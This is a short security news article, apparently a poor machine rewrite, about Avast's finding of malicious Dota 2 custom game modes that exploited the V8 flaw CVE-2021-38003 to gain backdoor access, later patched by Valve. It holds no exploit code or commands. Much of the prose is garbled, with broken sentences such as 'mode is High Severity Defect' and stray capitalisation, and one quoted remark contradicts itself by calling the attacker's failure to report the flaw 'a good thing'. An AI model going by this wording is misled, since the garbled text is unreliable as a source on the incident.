An unknown attacker may have created a malicious game mode for the Dota 2 multiplayer online battle arena (MOBA) video game and used it to establish backdoor access to a player’s system.
mode is High Severity Defect In the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS score: 8.8), which was exploited as a zero-day and was addressed by Google in October 2021.
“Because V8 was not sandboxed with Dota, an exploit alone allowed remote code execution against other Dota players,” said Avast researcher Jan Vojtěšek. Said In a report released last week.
Following Responsible Disclosure to Game Publisher Valve Fixes shipped By upgrading the version to V8 on January 12, 2023.
Game mode is basically Custom function It can extend existing titles or offer entirely new gameplay in ways that deviate from the standard rules.
Publishing a custom game mode to the Steam store involves a review process by Valve, but a malicious game mode discovered by an antivirus vendor managed to slip through the cracks.
These game modes that have since been removed are ‘test addon plz ignore’, ‘Overdog no nasty hero’, ‘Custom Hero Brawl’, and ‘Overthrow RTZ Edition X10 XP’. The threat actor is also said to have revealed his fifth game mode named Brawl in Petah Tiqwa. This mode does not contain malicious code.
Embedded within the “test addon plz ignore” is an exploit for a flaw in V8 that can be weaponized to execute custom shellcode.
The other three, on the other hand, take a more covert approach in that malicious code is designed to access remote servers and fetch JavaScript payloads. The server is no longer reachable.
In a hypothetical attack scenario, a player launching one of the above game modes could be targeted by an attacker to gain remote access to an infected host and deploy additional malware for further exploitation. .
It’s not immediately clear what the ultimate goal of the developers who created the game mode was, but Avast points out that it’s unlikely to be a benign research purpose.
“First, the attacker didn’t report the vulnerability to Valve (which is generally considered a good thing),” Vojtěšek said. “Second, the attackers tried to hide the exploit behind a secret backdoor.”
“It’s also possible that the attacker wasn’t purely malicious anyway. Such an attacker could definitely exploit this vulnerability to have much greater impact.”